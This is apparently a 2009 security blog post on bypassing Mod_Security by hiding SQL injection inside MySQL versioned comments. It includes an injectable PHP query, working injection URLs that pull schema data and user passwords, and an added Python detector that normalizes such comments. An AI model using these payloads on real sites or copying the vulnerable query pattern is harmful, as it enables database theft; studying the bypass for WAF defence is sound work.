A method that I discovered today in the MySQL documentation struck me with its simplicity, and with the fact that I had not noticed it before. Let me describe this method of bypassing a WAF.
MySQL servers allow one to use comments of the following type:
/*!sql-code*/ and /*!12345sql-code*/
As can be seen, in both cases the SQL code inside the comment is executed! The second form means that "sql-code" is executed only if the DBMS version is later than the given value.
As I have repeatedly asserted [1,2], some WAFs skip comments during signature matching. Among such WAFs is the latest stable build of Mod_Security (v. 2.5.9).
Here is a simple example:
...
// The request parameter is concatenated straight into the statement;
// this is the injection point the rest of the post relies on.
$query = "SELECT name FROM table WHERE id = " . $_GET['id'];
$result = mysql_query($query);
...
If the web application is protected by Mod_Security, the following request is blocked:
/?id=1+union+select+1
Remarkably, even the following requests (which are not valid in the considered example) are also blocked by the WAF (HPP/HPF techniques):
/?id=1+union/*&id=*/select+table_name+from+information_schema.columns
/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns
But if we use the described comment method, Mod_Security lets our requests through and the SQL injection can be exploited:
/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/
/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
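The defensive lesson of both the comment syntax described above and the bypasses just shown is that a filter must process `/*!...*/` the way the MySQL parser does: the body is executable SQL, not a comment. The following Python script is an added example, not code from the original post or from Mod_Security. It contrasts the comment handling the post attributes to some WAFs (every `/*...*/` block discarded) with a MySQL-aware normalization (body of `/*!...*/` and `/*!NNNNN...*/` kept, ordinary comments dropped), and runs a simple UNION ... SELECT signature over constructed sample requests modelled on the ones in the post. The parameter name `id`, the signature and the sample requests are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests in the form used in the post above:
# query strings only, '+' standing for a space, "id" is the vulnerable parameter.
SAMPLE_REQUESTS = {
    "benign":        "/?id=1",
    "plain":         "/?id=1+union+select+1",
    "versioned":     "/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                     "+from+information_schema.columns*/",
    "versioned_num": "/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)"
                     "+from+information_schema.columns*/",
}

# A deliberately simple signature: UNION followed somewhere by SELECT.
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)

# /*!...*/ or /*!NNNNN...*/ : MySQL executes the body (a 5- or 6-digit
# version prefix is optional). Simplified model of the MySQL lexer.
VERSIONED = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.S)
# Any remaining /*...*/ : MySQL discards it.
PLAIN = re.compile(r"/\*.*?\*/", re.S)


def strip_all_comments(sql):
    """Comment handling the post attributes to some WAFs: every /*...*/
    block is thrown away before signature matching, which also throws
    away the executable body of a /*!...*/ block."""
    return PLAIN.sub(" ", sql)


def normalize_like_mysql(sql):
    """Rewrite the value as the MySQL parser will see it: keep the body
    of versioned comments, then drop ordinary comments."""
    sql = VERSIONED.sub(r" \1 ", sql)
    return PLAIN.sub(" ", sql)


def parameter_values(request):
    """URL-decode the query string and return the parameter values."""
    query = urlsplit(request).query
    return [value for _, value in parse_qsl(query, keep_blank_values=True)]


def flagged(request, comment_handler):
    """True if the signature fires on any parameter value after the
    comments have been processed by comment_handler."""
    return any(UNION_SELECT.search(comment_handler(v)) for v in parameter_values(request))


def demo():
    """Map each sample to (flagged when comments are skipped,
    flagged after MySQL-aware normalization)."""
    return {
        name: (flagged(req, strip_all_comments), flagged(req, normalize_like_mysql))
        for name, req in SAMPLE_REQUESTS.items()
    }


if __name__ == "__main__":
    for name, (skipped, normalized) in demo().items():
        print(f"{name:14} comments-skipped={skipped!s:5} mysql-normalized={normalized}")
```

Running the script shows the two versioned-comment samples slipping past the comment-skipping handler while the normalized view exposes the UNION ... SELECT in all three injection samples; the benign request is not flagged by either. In a real deployment the same normalization belongs in the WAF's transformation pipeline, before any SQL signature is evaluated.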
Well, one more method to our arsenal :-)
Source: http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.htm